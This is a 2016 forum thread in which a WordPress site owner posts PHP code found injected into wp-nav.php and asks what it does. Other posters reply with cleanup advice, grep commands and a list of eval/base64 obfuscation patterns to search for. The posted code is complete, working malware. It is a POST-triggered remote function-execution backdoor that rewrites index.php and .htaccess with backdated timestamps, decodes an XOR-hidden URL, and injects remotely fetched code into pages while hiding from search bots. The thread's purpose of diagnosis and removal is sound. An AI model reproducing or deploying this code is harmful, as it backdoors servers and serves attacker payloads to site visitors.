Have I been hacked? PHP script in core wordpress file

***dbol*** · 02-06-2016, 07:55 PM

Hi,

I have a number of websites hosted on shared hosting, I use Wordfence security for Wordpress on a couple of them. It recently informed me that a Wordpress core file had been modified.

I checked by downloading Wordpress from the official website and comparing the files, the file that had been modified was in wp-includes/wp-nav.php

The below code had been added at line 530. Since I noticed this all my websites have been reverting to a very old version of PHP so some of them won't run. They return errors like 'requires PHP 5.3+'.

I can get them working again by editing the .htaccess file to change the PHP version back.

Can anyone help explain what the below code is trying to do and what steps I should take to get rid of it.

Any help would be greatly appreciated.

PHP Code:

//istart

function my_time($dir) {
    foreach (glob($dir . '/wp-*.php') as $f) {
        $times[] = filemtime($f);
    }
    $max = 1;
    for ($i = 0; $i < count($times) - 1; $i++) {
        $k = 1;
        for ($j = $i + 1; $j < count($times); $j++) {
            if ($times[$i] == $times[$j]) {
                $k++;
                if ($k > $max) {
                    $max = $k;
                    $time = $times[$i];
                }
            }
        }
    }
    return $time;
}

function my_correct($dir) {
    $time = 0;
    $path = $dir . '/index.php';
    $content = base64_decode('PD9waHAKLyoqCiAqIEZyb250IHRvIHRoZSBXb3JkUHJlc3MgYXBwbGljYXRpb24uIFRoaXMgZmlsZSB​kb2Vzbid0IGRvIGFueXRoaW5nLCBidXQgbG9hZHMKICogd3AtYmxvZy1oZWFkZXIucGhwIHdoaWNoIGR​vZXMgYW5kIHRlbGxzIFdvcmRQcmVzcyB0byBsb2FkIHRoZSB0aGVtZS4KICoKICogQHBhY2thZ2UgV29​yZFByZXNzCiAqLwoKLyoqCiAqIFRlbGxzIFdvcmRQcmVzcyB0byBsb2FkIHRoZSBXb3JkUHJlc3MgdGh​lbWUgYW5kIG91dHB1dCBpdC4KICoKICogQHZhciBib29sCiAqLwpkZWZpbmUoJ1dQX1VTRV9USEVNRVM​nLCB0cnVlKTsKCi8qKiBMb2FkcyB0aGUgV29yZFByZXNzIEVudmlyb25tZW50IGFuZCBUZW1wbGF0ZSA​qLwpyZXF1aXJlKCBkaXJuYW1lKCBfX0ZJTEVfXyApIC4gJy93cC1ibG9nLWhlYWRlci5waHAnICk7Cg=​=');
    if (file_get_contents($path) != $content) {
        chmod($path, 0644);
        file_put_contents($path, $content);
        chmod($path, 0444);
        $time = my_time($dir);
        touch($path, $time);
    }

    $path = $dir . '/.htaccess';
    $content = base64_decode('IyBCRUdJTiBXb3JkUHJlc3MKPElmTW9kdWxlIG1vZF9yZXdyaXRlLmM+ClJld3JpdGVFbmdpbmUgT24​KUmV3cml0ZUJhc2UgLwpSZXdyaXRlUnVsZSBeaW5kZXhcLnBocCQgLSBbTF0KUmV3cml0ZUNvbmQgJXt​SRVFVRVNUX0ZJTEVOQU1FfSAhLWYKUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWQKUmV​3cml0ZVJ1bGUgLiAvaW5kZXgucGhwIFtMXQo8L0lmTW9kdWxlPgoKIyBFTkQgV29yZFByZXNzCg==');
    if (file_exists($path) AND file_get_contents($path) != $content) {
        chmod($path, 0644);
        file_put_contents($path, $content);
        chmod($path, 0444);
        if (!$time) {
            $time = my_time($dir);
        }
        touch($path, $time);
    }
}

$p = $_POST;
$_passssword = '9c8568934a36e71d7c18f1f2d8f69c3e';
if (@$p[$_passssword] AND @$p['a'] AND @$p['c']) @$p[$_passssword](@$p['a'], @$p['c'], '');
my_correct(dirname(__FILE__) . '/..');

function request_url_data($url) {
    if(!is_valid_url($url))
        return false;

    $site_url = (preg_match('/^https?:\/\//i', $_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
    if (function_exists('curl_init')) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_TIMEOUT, 5);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_HTTPHEADER, array(
            'X-Forwarded-For: ' . $_SERVER["REMOTE_ADDR"],
            'User-Agent: ' . $_SERVER["HTTP_USER_AGENT"],
            'Referer: ' . $site_url,
        ));
        $response = trim(curl_exec($ch));
    } elseif (function_exists('fsockopen')) {
        $m = parse_url($url);
        if ($fp = fsockopen($m['host'], 80, $errno, $errstr, 6)) {
            fwrite($fp, 'GET http://' . $m['host'] . $m["path"] . '?' . $m['query'] . ' HTTP/1.0' . "\r\n" .
                'Host: ' . $m['host'] . "\r\n" .
                'User-Agent: ' . $_SERVER["HTTP_USER_AGENT"] . "\r\n" .
                'X-Forwarded-For: ' . @$_SERVER["REMOTE_ADDR"] . "\r\n" .
                    'Referer: ' . $site_url . "\r\n" .
                    'Connection: Close' . "\r\n\r\n");
            $response = '';
            while (!feof($fp)) {
                $response .= fgets($fp, 1024);
            }
            list($headers, $response) = explode("\r\n\r\n", $response);
            fclose($fp);
        }
    } else {
        $response = 'curl_init and fsockopen disabled';
    }
    return $response;
}

error_reporting(0);

//unset($_passssword);

if (function_exists("add_action")) {
    add_action('wp_head', 'add_2head');
    add_action('wp_footer', 'add_2footer');
}

function add_2head() {
    ob_start();
}

function is_valid_url(and$url)
{
    if (!preg_match('/^(.+?)(\d+)\.(\d+)\.(\d+)\.(\d+)(.+?)$/', $url, $m))
        return false;
    $url = $m[1].$m[5].'.'.$m[4].'.'.$m[3].'.'.$m[2].$m[6];
    return true;
}

function add_2footer() {
    $check = false;
    $check_data = "";
    if (!empty($_GET['check']) AND $_GET['check'] == '9c8568934a36e71d7c18f1f2d8f69c3e') {
        $check = true;
        $check_data = ('<!--checker_start ');
        $check_data .= (substr(request_url_data('http://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css'), 0, 100));
        $check_data .= (' checker_end-->');
    }

    if (!$check) {
        if (!@$_SERVER['HTTP_USER_AGENT'] OR (substr($_SERVER['REMOTE_ADDR'], 0, 6) == '74.125') OR preg_match('/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i', $_SERVER['HTTP_USER_AGENT']))
            return;

        $cookie_name = 'PHP_SESSION_PHP';
        if (isset($_COOKIE[$cookie_name]))
            return;

        foreach (array('/\.css$/', '/\.swf$/', '/\.ashx$/', '/\.docx$/', '/\.doc$/', '/\.xls$/', '/\.xlsx$/', '/\.xml$/', '/\.jpg$/', '/\.pdf$/', '/\.png$/', '/\.gif$/', '/\.ico$/', '/\.js$/', '/\.txt$/', '/ajax/', '/cron\.php$/', '/wp\-login\.php$/', '/\/wp\-includes\//', '/\/wp\-admin/', '/\/admin\//', '/\/wp\-content\//', '/\/administrator\//', '/phpmyadmin/i', '/xmlrpc\.php/', '/\/feed\//') as $regex) {
            if (preg_match($regex, $_SERVER['REQUEST_URI']))
                return;
        }
    }

    $buffer = ob_get_clean();
    ob_start();
    $regexp = '/<body[^>]*>/is';
    if (preg_match($regexp, $buffer, $m)) {
        $body = $m[0];
//        $url = base64_decode('a3d3czksLDE3Mi07Ni0xMS0xMjEsYW9sZCw8YmBmcSV2d25ccGx2cWBmPjcy​MTExOTs2OjMzMTkyOjc3');
        $url = decrypt_url('a3d3czksLDE3Mi07Ni0xMS0xMjEsYW9sZCw8YmBmcSV2d25ccGx2cWBmPjcyMTExOTs2OjMzMTkyOjc​3');
//        if (($code = request_url_data($url)) AND base64_decode($code) AND preg_match('#[a-zA-Z0-9+/]+={0,3}#is', $code, $m)) {
        if (($code = request_url_data($url)) AND $decoded = base64_decode($code, true)) {
//            $body .=  '<script>var date = new Date(new Date().getTime() + 60*60*24*7*1000); document.cookie="' . $cookie_name . '=' . mt_rand(1, 1024) . '; path=/; expires="+date.toUTCString();</script>';
//            $body .= base64_decode($m[0]);
            $body .= $decoded;
//            $body .= base64_decode($m[0]);
        }
        $body .= $check_data;

        $buffer = preg_replace($regexp, $body, $buffer);
    }
    echo $buffer;
    ob_flush();
}

function decrypt_url($encrypted_url)
{
    $encrypted_url = base64_decode($encrypted_url);
    $url = '';
    for ($i = 0; $i < strlen($encrypted_url); $i++)
    {
        $url .= chr(ord($encrypted_url[$i]) ^ 3);
    }
    return $url;
}//iend 

***rajakoppula*** · 02-07-2016, 03:56 AM

The source code is encrypted, So their is possibly it be hacked, are this might cause by installing any cracked, strange plugins which designed by hacker, and download from DOWNLOAD sites.

Regards,
Raja.

***dbol*** · 02-08-2016, 01:25 AM

(02-07-2016 03:56 AM)rajakoppula Wrote: The source code is encrypted, So their is possibly it be hacked, are this might cause by installing any cracked, strange plugins which designed by hacker, and download from DOWNLOAD sites.

Regards,
Raja.

Thanks for your reply. I decoded the base64 stuff, the script was changing the .htaccess file.

Do you know what the script is trying to do and if it is sending any of my information to a third party?

What would be the best way to find the plugin/theme that injected this script if this is indeed the case?

Cheers

***gruuvmunky*** · 02-08-2016, 05:21 AM

just reinstall wordpress latest version
problem solved

***dbol*** · 02-08-2016, 08:42 PM

(02-08-2016 05:21 AM)gruuvmunky Wrote: just reinstall wordpress latest version
problem solved

Thanks for your reply, I have done this and it appears to be working fine at the moment.

I'm just concerned about a potentially malicious plugin / theme that may cause the issue again. Is there a way to check them?

***gruuvmunky*** · 02-09-2016, 02:04 AM

wordfence has a scan that should check plugins for malware...
there is also another MALWARE plugin scanner I've used but can't remember the name.

***Zeitgeist*** · 02-11-2016, 06:10 PM

Use Eli´s ANTI-MALWARE SECURITY and BRUTEFORCE FIREWALL. It´s the best free plugin I could find. From what I see in your source code, you have a base64 in there. It´s an encryption that is usually used by hackers. Maybe try replacing the modified files or just re-install wordpress. Stop using plugins you find on the internet. On the long term, it will seriously compromise your security and most shared hosters hate customers with spammy software.
After a security breach like that, you should change the internal WP security keys. Google it if you don´t know how to do it. Besides, disable all unnecessary or outdated plugins. You need to find the cause for this hack or it will happen again. Ask your host to run a virus scan and deactivate all the plugins that are suspicious. Wordfence is great...just set it to a very high security and make sure to prevent brute-force by setting a low number of login-attemps. Well yeah, treat .png´s as potentially dangerous too, as they are a known cause for problems.
Change all passwords and try to find out if your theme has a timthumb vulnerability. That´s all I would do at first. And remove any base64 you come across. It´s often a sign of hacking.

***hanna21*** · 02-12-2016, 08:05 AM

ok since i deal with these things and also fixed my website from nulled script il help you on this, but!!!!! big but you need to do it your self if you want me to scan your server i will charge contact me on skype hanna21460 wil discuss.

also here is the hacked line.

Quote:if (preg_match($regexp, $buffer, $m)) {
$body = $m[0];
// $url = base64_decode('a3d3czksLDE3Mi07Ni0xMS0xMjEsYW9sZCw8YmBmcSV2d25ccGx2cWBmPjcyMTExOTs2OjMzMTkyOjc3');
$url = decrypt_url('a3d3czksLDE3Mi07Ni0xMS0xMjEsYW9sZCw8YmBmcSV2d25ccGx2cWBmPjcyMTExOTs2OjMzMTkyOjc3');
// if (($code = request_url_data($url)) AND base64_decode($code) AND preg_match('#[a-zA-Z0-9+/]+={0,3}#is', $code, $m)) {
if (($code = request_url_data($url)) AND $decoded = base64_decode($code, true)) {
// $body .= '<script>var date = new Date(new Date().getTime() + 60*60*24*7*1000); document.cookie="' . $cookie_name . '=' . mt_rand(1, 1024) . '; path=/; expires="+date.toUTCString();</script>';
// $body .= base64_decode($m[0]);
$body .= $decoded;
// $body .= base64_decode($m[0]);
}
$body .= $check_data;

$buffer = preg_replace($regexp, $body, $buffer);
}
echo $buffer;
ob_flush();
}

function decrypt_url($encrypted_url)
{
$encrypted_url = base64_decode($encrypted_url);
$url = '';
for ($i = 0; $i < strlen($encrypted_url); $i++)
{
$url .= chr(ord($encrypted_url[$i]) ^ 3);
}
return $url;
}//iend

Quote:base64_decode('a3d3czksLDE3Mi07Ni0xMS0xMjEsYW9sZCw8YmBmcSV2d25ccGx2cWBmPjcyMTExOTs2OjMzMTkyOjc3');

this line, is 100% hacked and encrypted no doubts mate, of course other lines dycrypt it on the fly.

Quote:function my_correct($dir) {
$time = 0;
$path = $dir . '/index.php';
$content = base64_decode('PD9waHAKLyoqCiAqIEZyb250IHRvIHRoZSBXb3JkUHJlc3MgYXBwbGljYXRpb24uIFRoaXMgZmlsZSBkb2Vzbid0IGRvIGFueXRoaW5nLCBidXQgbG9hZHMKICogd3AtYmxvZy1oZWFkZXIucGhwIHdoaWNoIGRvZXMgYW5kIHRlbGxzIFdvcmRQcmVzcyB0byBsb2FkIHRoZSB0aGVtZS4KICoKICogQHBhY2thZ2UgV29yZFByZXNzCiAqLwoKLyoqCiAqIFRlbGxzIFdvcmRQcmVzcyB0byBsb2FkIHRoZSBXb3JkUHJlc3MgdGhlbWUgYW5kIG91dHB1dCBpdC4KICoKICogQHZhciBib29sCiAqLwpkZWZpbmUoJ1dQX1VTRV9USEVNRVMnLCB0cnVlKTsKCi8qKiBMb2FkcyB0aGUgV29yZFByZXNzIEVudmlyb25tZW50IGFuZCBUZW1wbGF0ZSAqLwpyZXF1aXJlKCBkaXJuYW1lKCBfX0ZJTEVfXyApIC4gJy93cC1ibG9nLWhlYWRlci5waHAnICk7Cg==');
if (file_get_contents($path) != $content) {
chmod($path, 0644);
file_put_contents($path, $content);
chmod($path, 0444);
$time = my_time($dir);
touch($path, $time);
}

$path = $dir . '/.htaccess';
$content = base64_decode('IyBCRUdJTiBXb3JkUHJlc3MKPElmTW9kdWxlIG1vZF9yZXdyaXRlLmM+ClJld3JpdGVFbmdpbmUgT24KUmV3cml0ZUJhc2UgLwpSZXdyaXRlUnVsZSBeaW5kZXhcLnBocCQgLSBbTF0KUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWYKUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWQKUmV3cml0ZVJ1bGUgLiAvaW5kZXgucGhwIFtMXQo8L0lmTW9kdWxlPgoKIyBFTkQgV29yZFByZXNzCg==');
if (file_exists($path) AND file_get_contents($path) != $content) {
chmod($path, 0644);
file_put_contents($path, $content);
chmod($path, 0444);
if (!$time) {
$time = my_time($dir);
}
touch($path, $time);
}
}

ok next step advanced lets go hunting for hacked .php ,images files in all directories and hack all hacked tampered files listed in 1 notepad so its easy for us to find it and eliminate them all.

i also have a php script you just click it and it kills it all.

ok run ssh , via putty.exe run as root
for example we need to test wordpress site for , blackbox.com
then what you do is go to this directory via ssh.

command wll be cd /home/blackbox/public_html/

next

codes to search
eval(gzinflate(base64_decode
eval(base64_decode(
eval(gzinflate(base64_decode(
eval(gzuncompress(base64_decode(
eval(gzinflate(str_rot13(base64_decode(

copy each 1 line from above and enter it on code below , hope u can follow the logic.

Quote:find . -name "*.php" -print0 | xargs -0 egrep -l 'eval\(base64_decode\(' >> infectedfiles.txt

now paste this on ssh press enter , a new file name infectedfiles.txt will be created in /public_html , which is the root of the directory , so use your head to work around.

yes this code scanned from 1st to end of the entire directory + all files so your good.

once the file is created examine the infected files listed in the infectedfiles.txt and locate and replace with fresh.

your done.

***hanna21*** · 02-12-2016, 08:06 AM

here is more code to search

Quote: eval(gzinflate(base64_decode('Code')))
eval(gzinflate(str_rot13(base64_decode('Code'))))
eval(gzinflate(base64_decode(str_rot13('Code'))))
eval(gzinflate(base64_decode(base64_decode(str_rot13('Code')))))
eval(gzuncompress(base64_decode('Code')))
eval(gzuncompress(str_rot13(base64_decode('Code'))))
eval(gzuncompress(base64_decode(str_rot13('Code'))))
eval(base64_decode('Code'))
eval(str_rot13(gzinflate(base64_decode('Code'))))
eval(gzinflate(base64_decode(strrev(str_rot13('Code')))))
eval(gzinflate(base64_decode(strrev('Code'))))
eval(gzinflate(base64_decode(str_rot13('Code'))))
eval(gzinflate(base64_decode(str_rot13(strrev('Code')))))
eval(base64_decode(gzuncompress(base64_decode('Code'))))
eval(gzinflate(base64_decode(rawurldecode('Code'))))
eval(str_rot13(gzinflate(str_rot13(base64_decode('Code')))))

like i said catch up to what i said , if you want me to do pay for my time contact me hanna21460

***hanna21*** · 02-12-2016, 08:07 AM

also here is another code you can use.

check who changed files good
last -i | grep $(whoami)

this code will check what time,day ,date files was modified and location,by whome it was modified by